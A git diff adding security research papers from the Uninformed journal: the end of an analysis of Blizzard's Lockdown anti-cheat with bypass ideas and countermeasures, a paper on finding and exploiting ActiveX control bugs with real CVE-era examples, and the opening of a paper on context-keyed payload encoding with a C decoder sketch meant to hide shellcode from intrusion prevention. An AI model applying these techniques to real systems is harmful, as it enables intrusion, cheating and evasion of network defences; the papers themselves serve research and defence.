+protection systems (such as hardcoded base addresses of modules, checks on the
+authenticity of a CheckRevision caller, and so forth) by setting execute fetch
+breakpoints on choice code locations. Then, the attacker could simply alter
+the execution context when the breakpoints are hit, in order to bypass other
+protection mechanisms. For example, an attacker could set a read breakpoint
+on the hardcoded base address for the main process image inside the Lockdown
+module, and change the base address accordingly. The attacker would also
+have to patch GetModuleHandleA in order to complete this example attack.
+
+Suggested counters to attacks based on hardware breakpoints include:
+
+1. Validation of the vectored exception handler chain, which might be used to
+   intercept STATUS_SINGLE_STEP exceptions when hardware breakpoints are hit.
+   This is risky, as there are legitimate reasons for there to be "foreign"
+   vectored exception handlers, however.
+2. Checks to stop debuggers from attaching to the process, period. This is not
+   considered to be a viable solution since there are a number of legitimate
+   reasons for a debugger to be attached to a process, many of which may be
+   completely unknown to the end user (such as profilers, crash control and
+   reporting systems, and other types of security software). Attempting to
+   block debuggers may also prevent the normal operation of Windows Error
+   Reporting or a preconfigured JIT debugger in the event of a game crash,
+   depending on the implementation used. Ways of detecting debuggers include
+   calls to IsDebuggerPresent, NtQueryInformationProcess(...ProcessDebugPort..),
+   checks against NtCurrentPeb()->BeingDebugged, and so forth.
+3. Duplication of checks (perhaps in slightly altered forms) throughout the
+   execution of the checksum implementation. It is important for this
+   duplication to be inline as much as possible in order to eliminate single
+   points of failure that could be used to short-circuit protection schemes by
+   an attacker.
+4. Strengthening of the anti-debugging mechanism, as previously described.
+
+3.3) Main Process Image Module Base Address Restriction
+
+An attacker seeking to execute the Lockdown module in an untrusted process
+would need to bypass the restrictions on the base address of the main process
+image. The most likely approach to this would be a combination attack, whereby
+the attacker would use something like a set of hardware breakpoints to alter
+the hardcoded restrictions on module base addresses, and import table or code
+patch style hooks on the GetModuleHandleA API in order to defeat the secondary
+check on the module base address for the main executable image.
+
+Another approach would be to simply create the main executable image as a
+process, suspended, and then either create a new thread in the process or
+assume control of the initial thread in order to execute the Lockdown module.
+This gets the would-be attacker out of having to patch checks in the module, as
+there is currently no defense against this case implemented in the module.
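+
+As a rough illustration of the second approach, creating the genuine game
+process suspended requires nothing more than the standard process creation
+APIs. The snippet below is a hypothetical sketch only and omits the subsequent
+thread injection and module loading steps.
+
+#include <windows.h>
+
+// Hypothetical sketch of the "suspended process" approach described above.
+// The genuine game executable is started suspended so that its image occupies
+// the expected base address; driving the Lockdown module from a thread
+// injected into this process is not shown here.
+static BOOL LaunchGameSuspended(const char *exePath, PROCESS_INFORMATION *pi)
+{
+    STARTUPINFOA si;
+
+    ZeroMemory(&si, sizeof(si));
+    si.cb = sizeof(si);
+
+    return CreateProcessA(exePath, NULL, NULL, NULL, FALSE,
+                          CREATE_SUSPENDED, NULL, NULL, &si, pi);
+}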
+
+In order to strengthen this protection mechanism, the following approaches
+could be taken:
+
+1. Manually traverse the loaded module list (and examine the PEB) in order to
+   validate that the main process image is really at 0x00400000. All of these
+   mechanisms could be compromised, but checking each one creates additional
+   work for an attacker.
+2. Verify that the game has initialized itself to some extent. This would
+   make the approach of creating the game process suspended more difficult. It
+   would also otherwise make the use of the Lockdown module in an untrusted
+   process more difficult without tricking the module into believing that it is
+   running in an initialized game process. Determining how the game is
+   initialized is outside the scope of this paper, although an approach similar
+   to the current one, based on a checksum of Storm video memory (though with
+   more "redundancy", or an additional matrix of requirements for a legitimate
+   game process), could be used.
+
+3.4) Minor Functional Differences Between Lockdown Module Flavors
+
+Presently, an attacker needs to implement all flavors of the Lockdown module
+in order to be assured of a successful connection to Battle.net. However,
+even with the 20 possibilities now available, this is still not difficult due
+to the minor functional differences between the different Lockdown flavors.
+Moreover, it is trivially possible to find the "magic" constants that
+constitute the only functional differences between each flavor of Lockdown.
+
+In the author's tests, two pattern matches and a small 200-line C program were
+all that were necessary to programmatically identify all of the magical
+constants that represent the functional differences between each flavor of
+Lockdown module, in a completely automated fashion. In fact, the author would
+wager that it took more time to implement all 20 different flavors of Lockdown
+modules than it took to devise and implement a rudimentary pattern matching
+system to automagically discover all 20 magical constants from the set of 20
+Lockdown module flavors. Clearly, this is not desirable from the standpoint
+of effort put into the protection scheme versus the difficulty of attacking it.
+
+In order to address these weaknesses, the following steps could be implemented:
+
+1. Implement true, major functional differences between Lockdown flavors.
+   Instead of using a single constant value that is different between each
+   flavor (probably a preprocessor constant), implement other,
+   real functional differences. Otherwise, even with a number of different
+   "non-functional" differences between module flavors, a pattern-matching
+   system will be able to quickly locate the different constants for each
+   module after a human attacker has discovered the constant for at least one
+   module flavor.
+2. Avoid using quick-to-substitute constants as the "meat" of the functional
+   differences between flavors. While these are convenient from a development
+   perspective, they are also convenient from an attacker perspective. If a
+   bit more time were spent from a development perspective, attackers could be
+   made to do real analysis of each module separately in order to determine the
+   actual functional differences, greatly increasing the amount of time that is
+   required for an attacker to defeat this protection scheme.
+
+3.5) Spoofed Return Address for CheckRevision Calls
+
+Due to how the x86 architecture works, it is trivially easy to spoof the return
+address pointer for a procedure call.
All that one must do is push the spoofed +return address on the stack, and then immediately execute a direct jump to the +target procedure (as opposed to a standard call). + +As a result, it is fairly trivial to bypass this protection mechanism at +run-time. One need only search for a `ret' opcode in the code space of the +Battle.snp module in memory, and use the technique described previously to +simply "bounce" the call off of Battle.snp via the use of a spoofed return +address. To the Lockdown module, the call will appear to originate from the +context of Battle.snp, but in reality the call will immediately return from +Battle.snp to the real caller in the untrusted process. + +To counter this, the following could be attempted: + +1. Verify two return addresses deep, although due to the nature of the x86 + calling conventions (at least stdcall and fastcall, the two used by + Blizzard code frequently), it is not guaranteed that four bytes past the + return address will be a particularly meaningful value. +2. Verify that the return address does not point directly to a `ret', `jmp', + `call' or similar instruction, assuming that current Battle.snp variations do + not use such patterns in their call to the module. This only slightly raises + the bar for an attacker, though; he or she would only need pick a more + specific location in Battle.snp through which to stage a call, such as the + actual location used in normal calls to the Lockdown module. + +3.6) Limited Pool of Challenge/Response Tuples + +Presently, the Battle.net servers contain a fairly limited pool of possible +challenge/response pairs for the version check and authentication system. +Observations suggest that most products have a pool of around one thousand +values that can be sent to clients. This has been used against Battle.net in +the past, which was countered by an increase to 20000 possible values for +several Battle.net products. Even with 20000 possible values, though, it is +still possible to capture a large number of logon attempts over time and build +a lookup table of possible values. This is an attractive option for an +attacker, as he or she need only perform passive analysis over a period of time +in order to construct a database capable of logging on to Battle.net with a +fairly high success rate. Given the relative infrequency of updates to the +pool of version check values (typically once per patch), this is considered to +be a fairly viable method for an attacker to bypass the version check and +authentication system. + +This limitation could easily be addressed by Blizzard, however, such as through +the implementation of one or more of the below suggestions: + +1. Periodically rotate the set of possible version check values so as to ensure + that a database of challenge/response pairs would quickly expire and need to + be rebuilt. Combined with a large pool of possible values, this approach + would greatly reduce the practicality of this attack. Unfortunately, the + author suspects that this would require manual intervention each time the + pools were to be rotated by the part of Blizzard in the current Battle.net + server implementation. +2. Implement dynamic generation of pool values at runtime on each Battle.net + server. 
This would require the server to have access to the requisite client
+   binaries, but is not expected to be a major challenge (especially since the
+   author suspects that Battle.net is powered by Windows already, which would
+   allow the existing Lockdown module code to be cleaned up and repackaged for
+   use on the server as well). This could be implemented as a pool of possible
+   values that is simply stirred every so often; new challenge/response values
+   need not necessarily be generated on each logon attempt (and doing so would
+   have undesirable performance implications in any case).
+
+4) Conclusion
+
+Although the Lockdown module and associated authentication system represent
+a major step forward in Blizzard's ongoing battle against non-genuine
+Battle.net client software, there are still many improvements that could be
+made in a future release of the version check and authentication system which
+would fit within the constraints imposed on the version check system, and
+still pose a significant challenge to an adversary attempting to spoof
+Battle.net logons using a non-genuine client. The author would encourage
+Blizzard to consider and implement enhancements akin to those described in
+this paper, particularly protections that overlap and complement each other
+(such as the debug register clearing and memory checksum schemes).
+
+In the vein of improving the Lockdown system, the author would like to stress
+the following principles as especially important in creating a system that is
+difficult to defeat and yet still workable and viable from a development and
+deployment perspective:
+
+- Defense in depth with respect to the various protection mechanisms in place
+  within the module is a must. Protection systems need to be designed to
+  complement and reinforce each other, such that an attacker must defeat a
+  number of layers of protection schemes for any one significant attack to
+  succeed to the point of being a break in the system.
+
+- Countermeasures intended to frustrate reverse engineering or easy duplication
+  of critical algorithms need to be viewed in the light of what an adversary
+  might do in order to 'attack' (or duplicate, re-implement, or whatnot) a
+  'guarded' (or otherwise important) algorithm or section of code. For
+  example, an attacker could ease the work of reimplementing parts of an
+  algorithm or function of interest by wholesale copying of assembler code
+  into a different module, or by loading an "authentic" module and making
+  direct calls into internal functions (or the middle of internal functions) in
+  an effort to bypass "upstream" protection checks. Keeping with this line of
+  thinking, it would be advisable to interleave protection checks with code
+  that performs actual useful work to a certain degree, such that it is less
+  trivial for an adversary to bypass protection checks that are entirely done
+  "up front" (leaving the remainder of a secret algorithm or function
+  relatively "vulnerable", if the check code is skipped entirely).
+
+- Countermeasures intended to create "time sinks" for an adversary need to be
+  carefully designed such that they are not easily bypassed.
For instance, in
  the current Lockdown module implementation, there are twenty flavors of the
  Lockdown module; yet, in this implementation, it is trivially easy for an
  adversary to discover the differences (in a largely programmatic fashion),
  making this "time sink" highly ineffective, as the time for an adversary to
  breach it is likely much less than the time it took the original developers
  to create it.

- Measures that depend on external, imported APIs are often relatively easy for
  an attacker to quickly pinpoint and disable (for example, the method by which
  debug register breakpoints are disabled by the Lockdown module is immediately
  obvious to any adversary who is even the least bit familiar with the Win32
  API, which must be assumed). In some cases (such as with the debug register
  breakpoint clearing code), this cannot be avoided, but in others (such as
  validation of module base addresses), the same effect could potentially be
  implemented by use of less-obvious approaches (for example, manually
  traversing the loaded module list by locating the PEB and the loader data
  structures from the backlink pointer in the current thread's TEB). The
  author would encourage the developers of additional defensive measures to
  reduce dependencies on easily-noticeable external APIs as much as possible
  (balanced, of course, against the need for maintainable code that executes
  on all supported platforms). In some instances, such as the manual
  resolution of Storm symbols, the current system does do a fair job of
  avoiding easily-detectable external API use.

All things considered, the Lockdown system represents a major step forward in
the vein of guarding Battle.net from unauthorized clients. Even so, there is
still plenty of room for improvement in potential future revisions of the
system. The author hopes that this article may prove useful in the
strengthening of future defensive systems, by virtue of a thorough accounting
of the strengths and weaknesses in the current Lockdown module (and pointed
suggestions as to how to repair certain weaker mechanisms in the current
implementation).

diff --git a/uninformed/9.2.txt b/uninformed/9.2.txt new file mode 100644 index 0000000..03ac721 --- /dev/null +++ b/uninformed/9.2.txt @@ -0,0 +1,297 @@

ActiveX - Active Exploitation
01/2008
warlord
warlord@nologin.org
http://www.nologin.org

Share what I know, learn what I don't

1) Foreword

First of all, I'd like to explain what this paper is all about, and
especially, what it is not. A few months ago I got into the technical details
of ActiveX for the first time. Prior to this point I only had some vague ideas
and a general understanding of what it is and how it works. What I did first
is probably quite obvious: I googled. To my surprise though, I could not find
a single paper discussing ActiveX and how to exploit it. My next step was to
contact some generally smart and knowledgeable friends to harvest the required
information from them. I was even more surprised to find that some of the
most skilled people out there lacked the same knowledge that I did. Perhaps
it's our common background, coming from the Unix/Linux world, but whatever the
reason, I had to work to collect the information I now possess. But still, I
feel like I'm the one-eyed man explaining what the world looks like to the
blind.

The fact that there are tons of ActiveX exploits on Milw0rm suggests that the
knowledge is out there by now.
I wonder why no one took the
time to write it all up so the less knowledgeable may get into this theater as
well. It's the intention of this paper to fill this gap. If you already know
everything about ActiveX, if you've found your own 0day and exploited it
successfully, I probably can't teach you any new tricks. Everyone else I
invite to read on.

2) Introduction

ActiveX[1] is a Microsoft technology introduced in 1996 and based on the
Component Object Model (COM) and Object Linking and Embedding (OLE)
technologies. The intention of COM has been to create easily reusable pieces
of code by creating objects that offer interfaces which can be called by
other COM objects or programs. This technology is widely used for what
Microsoft calls ActiveX[2], which represents the integration of COM into
Internet Explorer. This integration offers the ability to interface with
Windows as well as third-party applications from within the MS browser. It
allows for the easy extension of functionality in Internet Explorer by giving
software developers the ability to create complex applications which can
interface with websites through the browser.

There are various ways for an ActiveX control to end up on any given machine.
Besides all the controls which are part of IE or the operating system,
programs may install and register ActiveX controls of their own to offer a
diverse set of functions in IE. Another way of installing a new control is
through web sites themselves. Depending on Internet Explorer security
settings, a website may try to instantiate a control, for example Shockwave
Flash, and failing to do so may prompt the user to install the Shockwave Flash
ActiveX control.

Security issues seem to be a constant problem with ActiveX controls. In fact,
it seems most vulnerabilities in Windows nowadays are actually due to
poorly-written third-party controls which allow malicious websites to exploit
buffer overflows or abuse command injection vulnerabilities. Quite often
these controls give the impression that their authors never realized their
code could be instantiated from a remote website.

The following chapters describe methods to find, analyze, and exploit bugs in
ActiveX controls.

3) Control and functionality enumeration

Any given Windows installation is likely to have a significant number of
registered COM objects. For the purpose of this paper, however, we are only
interested in controls which may be instantiated from a website. Quite a
number of the following details are taken from the excellent "The Art of
Software Security Assessment"[3], a book I strongly recommend to anyone
interested in application security.

ActiveX controls are usually, but not always, instantiated by passing their
CLSID to CoCreateInstance. The respective class identifier (CLSID) is used as
a unique value which is associated with each control in order to distinguish
it from its peers. A list of all the existing CLSIDs on a given Windows
installation can be found in the registry in HKEY_CLASSES_ROOT\CLSID, which
actually is nothing but an alias to HKEY_LOCAL_MACHINE\Software\Classes\CLSID.

Within the CLSID key there are thousands of different class identifiers, all
of them specifying ActiveX controls. However, only a subset of those can be
instantiated by a website. Controls marked as safe for scripting are granted
this ability.
To determine whether a certain control has this ability, it has to be part of
the respective category. Specifically, the category can be found in the
registry under HKEY_CLASSES_ROOT\CLSID\<CLSID>\Implemented Categories. If a
control is safe for scripting it may indicate this by having a subkey with
the GUID 7DD95801-9882-11CF-9FA9-00AA006C42C4. Similarly, the 'safe for
initialization' category is listed in the same location, but with a slightly
different GUID. Its value is 7DD95802-9882-11CF-9FA9-00AA006C42C4.

In the end though, not being part of these categories doesn't necessarily mean
that a control cannot be called from IE. The component may dynamically report
itself as being safe for scripting when it is instantiated through IE. The
only surefire way is to try to instantiate a control and see if it can be
used. Axman[5] is an ActiveX fuzzer written by HD Moore which can automate
this check for all of the different CLSIDs on a system. Another tool to
enumerate the controls in question is iDefense's ComRaider[4], another ActiveX
fuzzer, which has the ability to build a database of controls that IE should
be able to instantiate.

3.1) ProgIDs

Besides the long and rather hard-to-memorize CLSID, there is often a second
way of instantiating a certain control. This can be accomplished through the
use of a control's program ID (ProgID). Quite similar to IP addresses and the
domain name system (DNS), ProgIDs can be looked up to determine the matching
CLSID. Once the right one has been determined, Internet Explorer goes on as
if the CLSID had been provided in the first place.

For this technique to work for a given control, two requirements must be met.
First, the control must have a ProgID subkey under its CLSID key in the
registry. ProgIDs are usually in the form Program.Component.Version, such as
SafeWia.Script.1. Second, as there is no point for Windows to walk through up
to 2700 CLSIDs (in my example) to find the specified ProgID, the program ID
itself must have a key in HKEY_CLASSES_ROOT with a subkey named CLSID which
makes the association.

3.2) The Kill Bit

In some cases it is desirable to restrict a control from ever being
instantiated in IE. This can be accomplished through the use of a kill bit.
The kill bit is set by turning on the 0x00000400 bit in the Compatibility
Flags DWORD value beneath the key associated with a given CLSID:

HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\<CLSID>

3.3) User Specific Controls

With Windows XP, Microsoft introduced support for user-specific ActiveX
controls. These do not require Administrator-level access to install because
the controls are specific to a certain user, as the name already implies.
These controls can be found under HKEY_CURRENT_USER\Software\Classes. While
this functionality exists, most ActiveX controls are installed globally.

3.4) Determining Exported Functions

ActiveX controls implement various COM interfaces in the same manner as any
other COM object. COM interfaces are well-defined definitions of what
functions and properties a COM class must implement and support. COM provides
the ability to dynamically query a COM class at runtime using QueryInterface
to see what interfaces it implements. This is how IE determines if a control
supports the safe for scripting interface (which is called IObjectSafety).
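The same check can be performed programmatically. The small C program below
is only a rough sketch of the idea: it creates an object from its CLSID and
then queries it for IObjectSafety, much like IE does at runtime. The CLSID
used here is the one of the MW6 QRCode control examined in the next section;
error handling and the equivalent 'safe for initialization' query are omitted
for brevity.

/*
 * iesafe.c - ask a control whether it claims to be safe for scripting.
 * Build as a console program and link against ole32.lib and uuid.lib.
 */
#include <windows.h>
#include <objsafe.h>
#include <stdio.h>

int main(void)
{
    CLSID clsid;
    IUnknown *unk = NULL;
    IObjectSafety *safety = NULL;
    DWORD supported = 0, enabled = 0;

    CoInitialize(NULL);

    /* CLSID of the control under test (MW6 QRCode ActiveX in this case) */
    CLSIDFromString(L"{3BB56637-651D-4D1D-AFA4-C0506F57EAF8}", &clsid);

    if (SUCCEEDED(CoCreateInstance(&clsid, NULL, CLSCTX_INPROC_SERVER,
                                   &IID_IUnknown, (void **)&unk)))
    {
        /* QueryInterface for IObjectSafety, just like IE does */
        if (SUCCEEDED(unk->lpVtbl->QueryInterface(unk, &IID_IObjectSafety,
                                                  (void **)&safety)))
        {
            safety->lpVtbl->GetInterfaceSafetyOptions(safety, &IID_IDispatch,
                                                      &supported, &enabled);
            printf("safe for scripting: %s\n",
                   (enabled & INTERFACESAFE_FOR_UNTRUSTED_CALLER) ? "yes" : "no");
            safety->lpVtbl->Release(safety);
        }
        unk->lpVtbl->Release(unk);
    }

    CoUninitialize();
    return 0;
}

A control that neither lists itself under Implemented Categories nor answers
this query positively should not normally be scriptable from a web page; tools
like Axman and ComRaider automate exactly this kind of probing on a large
scale.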
4) Examples

4.1) MW6 Technologies QRCode ActiveX 3.0

In this section the previously provided information will be demonstrated with
the help of a recent public ActiveX vulnerability and exploit. The vulnerable
control is from a company called MW6 Technologies and comes with their
"QRCode ActiveX" version 3.0. When I downloaded the software in January 2008,
several months after the exploit was posted on Milw0rm in September 2007, the
vulnerable control was still part of the package.

The control itself has a CLSID of 3BB56637-651D-4D1D-AFA4-C0506F57EAF8. After
the installation of the software, it can be found in the registry in:

HKEY_CLASSES_ROOT\CLSID\{3BB56637-651D-4D1D-AFA4-C0506F57EAF8}

The DLL that implements this control can be found on the hard drive in the
file that is specified in the "InprocServer32" key. In this example it is:

C:\WINDOWS\system32\MW6QRC~1.DLL

There are two interesting things to note here. For one, the ProgID key has a
default value of MW6QRCode.QRCode.1. At the ProgID's corresponding location in
the registry, namely HKCR\MW6QRCode.QRCode.1, the CLSID subkey contains the
CLSID of that control. This tells us that this control can be instantiated
using both its CLSID and its ProgID. Another point of interest in the registry
is the absence of the "Implemented Categories" key. This means that this
control is neither part of the "safe for scripting" nor the "safe for
initialization" category. However, it appears that the control must implement
IObjectSafety, since it is still possible to instantiate the control from IE.
The following simple HTML code, essentially just an object tag referencing the
control's CLSID, tries to instantiate the control:

<html>
  <object classid="clsid:3BB56637-651D-4D1D-AFA4-C0506F57EAF8"></object>
</html>

The result of this snippet of code is the appearance of a little picture in
IE. As this works just fine without Internet Explorer complaining about being
unable to load the control, the next examination step is in order.

4.1.1) Enumerating Exported Interfaces

By now it has been shown that the example control can be instantiated from IE
just fine. The question now is what kind of interfaces the control provides
to the caller. By submitting the specific CLSID of the control that is to be
examined to ComRaider, the tool lists all of the control's implemented
functions as well as the kind and number of expected parameters. An
alternative to ComRaider is the OLE/COM Object Viewer that comes with the
Platform SDK and Visual Studio.

4.1.2) Exploitation

After playing around with various functions, it soon becomes obvious that
SaveAsBMP and SaveAsWMF happily accept any path provided to save the
generated graphic in the specified location. This makes it possible to
overwrite existing files with the picture if the user running IE has
sufficient access. This is a perfect example of a program using untrusted
data and operating on it without any kind of checks. It is likely that the
control's author did not consider the security implications of what they were
doing.

A sample exploit for this vulnerability, written by shinnai, can be found on
Milw0rm: http://www.milw0rm.com/exploits/4420.

4.2) HP Info Center

On December 12th, 2007, a vulnerability in an ActiveX control which was
shipped by default with multiple series of Hewlett Packard notebooks was
disclosed. The issue itself was found in a piece of software called the HP
Info Center. The vulnerability allowed remote read and write access to the
registry as well as the execution of arbitrary commands.
By instantiating +this control in Internet Explorer and calling the vulnerable functions it was +possible to run software with the same level of access as the user running IE. +Porkythepig found and disclosed this serious threat and wrote a detailed +report as well as a sample exploit covering three attack vectors. + +The HP control with the CLSID 62DDEB79-15B2-41E3-8834-D3B80493887A was +responsible for the listed vulnerabilities. By default it installs itself into +C:\Program Files\Hewlett-Packard\HP Info Center. In his advisory, porky +listed three potentially insecure methods as well as the expected parameters: + + - VARIANT GetRegValue(String sHKey, String sectionName, String keyName); + - void SetRegValue(String sHKey, String sSectionName, String sKeyName, String sValue); + - void LaunchApp(String appPath, String params, int cmdShow); + +While the first and second method allow for remote read and write access to +the registry, the third function runs arbitrary programs. For example, an +attacker could execute cmd.exe with arbitrary arguments. + +In this example the vulnerable control provided remote access to the victims +machine. Sample code to exploit all three functions can once again be found on +Milw0rm: http://www.milw0rm.com/exploits/4720. + +4.3) Vantage Linguistics AnswerWorks + +The third and last example of various ActiveX vulnerabilities is in the +Vantage Linguistics AnswerWorks. Advisories covering this vulnerability were +released in December, 2007. The awApi4.AnswerWorks.1 control exports several +functions which are prone to stack-based buffer overflows. The functions +GetHistory(), GetSeedQuery(), and SetSeedQuery() fail to properly handle long +strings provided by a malicious website. The resulting stack-based buffer +overflow allows for the execution of arbitrary code, as "e.b." demonstrates +with a proof of concept that binds a shell to port 4444 when the exploit +succeeds. + +When the exploit is loaded from a webserver it instatiates the CLSID and links +the created object to a variable named obj. It then calls the GetHistory() +function with a carefully crafted string which consists of 214 A's to fill the +buffer followed by a return address which overwrites the one saved on the +stack. After those 4 bytes come 12 NOPs and then finally the shellcode. As +one can easily see, this exploit is based on the same techniques that can be +seen in many other stack-based exploits. + +The exploit mentioned in this example can also be found on Milw0rm: +http://www.milw0rm.com/exploits/4825. + +5) Summary + +This paper has provided a brief introduction to ActiveX. The focus has been +on discussing some of the underlying technology and security related issues +that can manifest themselves. This was meant to equip the reader with enough +background knowledge to examine ActiveX controls from a security point of +view. The author hopes he managed to describe the big picture in enough detail +to provide readers with enough information on the matter to base further +research on the aquired knowledge. 
+ +5.1) Acknowledgements + +wastedimage - For answering the first questions +deft - For providing lots of answers and examples +rjohnson - For filling in details deft forgot to mention +skape - For background knowledge on underlying functions +hdm - For knowing all the rest + +References + +[1] ActiveX Controls @ Wikipedia + http://en.wikipedia.org/wiki/ActiveXcontrol + +[2] ActiveX Controls + http://msdn2.microsoft.com/en-us/library/aa751968.aspx + +[3] The art of software security assessment + http://taossa.com + +[4] ComRaider + http://labs.idefense.com/software/fuzzing.php#morecomraider + +[5] Axman ActiveX Fuzzer + http://www.metasploit.com/users/hdm/tools/axman/ diff --git a/uninformed/9.3.txt b/uninformed/9.3.txt new file mode 100644 index 0000000..05f16fc --- /dev/null +++ b/uninformed/9.3.txt @@ -0,0 +1,679 @@ +Context-keyed Payload Encoding +Preventing Payload Disclosure via Context +October, 2007 +I)ruid, C²ISSP +druid@caughq.org +http://druid.caughq.org + +Abstract + +A common goal of payload encoders is to evade a third-party detection mechanism which +is actively observing attack traffic somewhere along the route from an attacker +to their target, filtering on commonly used payload instructions. The use of +a payload encoder may be easily detected and blocked as well as opening up the +opportunity for the payload to be decoded for further analysis. Even +so-called keyed encoders utilize easily observable, recoverable, or guessable +key values in their encoding algorithm, thus making decoding on-the-fly +trivial once the encoding algorithm is identified. It is feasible that an +active observer may make use of the inherent functionality of the decoder stub +to decode the payload of a suspected exploit in order to inspect the contents +of that payload and make a control decision about the network traffic. This +paper presents a new method of keying an encoder which is based entirely on +contextual information that is predictable or known about the target by the +attacker and constructible or recoverable by the decoder stub when executed at +the target. An active observer of the attack traffic however should be unable +to decode the payload due to lack of the contextual keying information. + + +1) Introduction + +In the art of vulnerability exploitation there are often numerous hurdles that +one must overcome. Examples of hurdles can be seen as barriers to traversing +the attack vector and challenges with developing an effective vulnerability +exploitation technique. A critical step in the later inevitabley requires the +use of an exploit payload, traditionally referred to as shellcode. A payload +is the functional exploit component that implements the exploit's purpose[1]. + +One barrier to successful exploitation may be that including certain byte +values in the payload will not allow the payload to reach its destination in +an executable form[2], or even at all. Another hurdle to overcome may be that an +in-line network security monitoring device such as an Intrusion Prevention +System (IPS) could be filtering network traffic for the particular payload +that the exploit intends to deliver[3, 288-289], or otherwise extracting the +payload for further automated analysis[4][5, 2]. Whatever the hurdle may be, +many challenges relating to the payload portion of the exploit can be overcome +by employing what is known as a payload encoder. + +1.1) Payload Encoders + +Payload encoders provide the utility of obfuscating the exploit's payload +while it is in transit. 
Once the payload has reached its target, the payload +is decoded prior to execution on the target system. This allows the +payload to bypass various controls and restrictions of the type mentioned +previously while still remaining in an executable form. In general, an +exploit's payload will be encoded prior to packaging in the exploit itself +and what is known as a decoder stub will be prepended to the +encoded payload which produces a new, slightly larger payload. This new +payload is then packaged within the exploit in favor of the original. + +1.1.1) Encoder + +The encoder can take many forms and provide its function in a number of +different ways. At its most basic definition, an encoder is simply a function +used when packaging a payload for use by an exploit which encodes the payload +into a different form than the original. There are many different encoders +available today, some of which provide encoding such as alphanumeric +mixed-case text[6], Unicode safe mix-cased text[7], UTF-8 and tolower() +safe[2], and XOR against a 4-byte key[8]. There is also an extremely +impressive polymorphic XOR additive feedback encoder available called Shikata +Ga Nai[9]. + +1.1.2) Decoder Stub + +The decoder stub is a small chunk of instructions that is prepended to the +encoded payload. When this new payload is executed on the target system, the +decoder stub executes first and is responsible for decoding the original +payload data. Once the original payload data is decoded, the decoder stub +passes execution to the original payload. Decoder stubs generally perform a +reversal of the encoding function, or in the case of an XOR obfuscation +encoding, simply perform the XOR again against the same key value. + +1.1.3) Example: Metasploit Alpha2 Alphanumeric Mixedcase Encoder (x86) + +The Metasploit Alpha2 Alphanumeric Mixedcase Encoder[6] encodes payloads as +alphanumeric mixedcase text using SkyLined's Alpha2 encoding suite. This +allows a payload encoded with this encoder to traverse such attack vectors as +may require input to pass text validation functions such as the C89 standard +functions isalnum() and isprint(), as well as the C99 standard function +isascii(). + +1.1.4) Keyed Encoders + +Many encoders utilize encoding techniques which require a key value. The +Call+4 Dword XOR encoder[8] and the Shikata Ga Nai polymorphic XOR additive +feedback encoder[9] are examples of keyed encoders. + +Key Selection + +Encoders which make use of key data during their encoding process have +traditionally used either random or static data chosen at the time of +encoding, or data that is tied to the encoding process itself[10], such as the +index value of the current position in the buffer being operated on, or a +value relative to that index. + +Example: Metasploit Single-byte XOR Countdown Encoder (x86) + +The Metasploit Single-byte XOR Countdown Encoder[10] uses the length of the +remaining payload to be operated upon as a position-dependent encoder key. +The benefit that this provides is a smaller decoder stub, as the decoder stub +does not need to contain any static keying information. Instead, it tracks +the length property of the payload as it decodes and uses that information as +the key. + +Weaknesses + +The most significant weakness of most keyed encoders available today is that +the keying information that is used is either observable directly or +constructable from the observed decoder stub. 
Either the static key +information is transmitted within the exploit as part of the decoder stub +itself, or the key information is reproducible once the encoding algorithm is +known. Knowledge of the encoding algorithm is usually obtainable by +recognizing known decoder stubs or analyzing unknown decoder stubs +instructions in detail. + +The expected inherent functionality of the decoder stub also introduces a +weakness. Modern payload encoders rely upon the decoder stub's ability to +properly decode the payload at run-time. It is feasible that an active +observer may exploit this inherent functionality to decode a suspected payload +within a sandbox environment in real-time[5,3] in order to inspect the contents of +the payload and make a control decision about the network traffic it was found +in. Because the decoder stub requires only that it is being executed by a +processor that will understand its instruction-set, producing such a sandbox +is trivial. + +Unfortunately, all of the aforementioned keyed encoders include the static key +value directly in their decoder stubs and are thus vulnerable to the +weaknesses described here. This allows an observer of the encoded payload in +transit to potentially decode the payload and inspect it's content. +Fortunately, all of the keyed encoders previously mentioned could potentially +be improved to use contextual keying as is described in the following chapter. + +2) Contextual Keying + +Contextual keying is defined as the process of selecting an encoding key from +context information that is either known or predictable about the target. A +context-key is defined as the result of that process. The context information +available about the exploit's target may contain any number of various types +of information, dependent upon the attacker's proximity to the target, +knowledge of the target's operation or internals, or knowledge of the target's +environment. + +2.1) Encoder + +When utilizing a context-key, the method of encoding is largely unchanged from +current methods. The exploit crafter simply passes the encoding function the +context-key as its static key value. The size of the context-key is dependent +upon the requirements of the encoder being used; however, it is feasible that +the key may be of any fixed length, or ideally the same size as the payload +being encoded. + +2.2) Decoder Stub + +The decoder stub that requires a context-key is not only responsible for +decoding the encoded payload but is also responsible for retrieving or +otherwise generating its context-key from the information that is available to +it at run-time. This may include retrieving a value from a known memory +address, performing some calculation on other information available to it, or +any number of other possible scenarios. The following section will explore +some of the possibilities. + +2.3) Application Specific Keys + +2.3.1) Static Application Data + +If the attacker has the convenience of reproducing the operating environment +and execution of the target application, or even simply has access to the +application's executable, a context-key may be chosen from information known +about the address space of the running process. Known locations of static +values such as environment variables, global variables and constants such as +version strings, help text, or error messages, or even the application's +instructions or linked library instructions themselves may be chosen from as +contextual keying information. 
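To make the idea more concrete, the following C fragment sketches what a
context-keyed decoder amounts to conceptually; an actual decoder stub would of
course be a handful of hand-written instructions rather than compiled C. The
address used for KEY_ADDR is a placeholder and is assumed to point at four
bytes of static data in the target process (for example, somewhere in the
read-only .text section of a loaded module); the payload bytes shown are
likewise placeholders.

/* Conceptual sketch of a context-keyed XOR decoder (not a real stub). */
#include <stddef.h>

#define KEY_ADDR ((unsigned char *)0x77e80100) /* placeholder: static data in the target */

static unsigned char payload[] = { 0xcc, 0xcc, 0xcc, 0xcc }; /* encoded payload bytes */

static void decode_and_run(void)
{
    unsigned char *key = KEY_ADDR;
    size_t i;

    /* Recover the context-key from the target's own memory and decode in place. */
    for (i = 0; i < sizeof(payload); i++)
        payload[i] ^= key[i % 4];

    /* Transfer control to the now-decoded payload. */
    ((void (*)(void))payload)();
}

Note that nothing resembling the key itself ever appears in the stub; only the
address it is fetched from does, and that address is meaningless to an
observer who cannot reproduce the target's address space.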
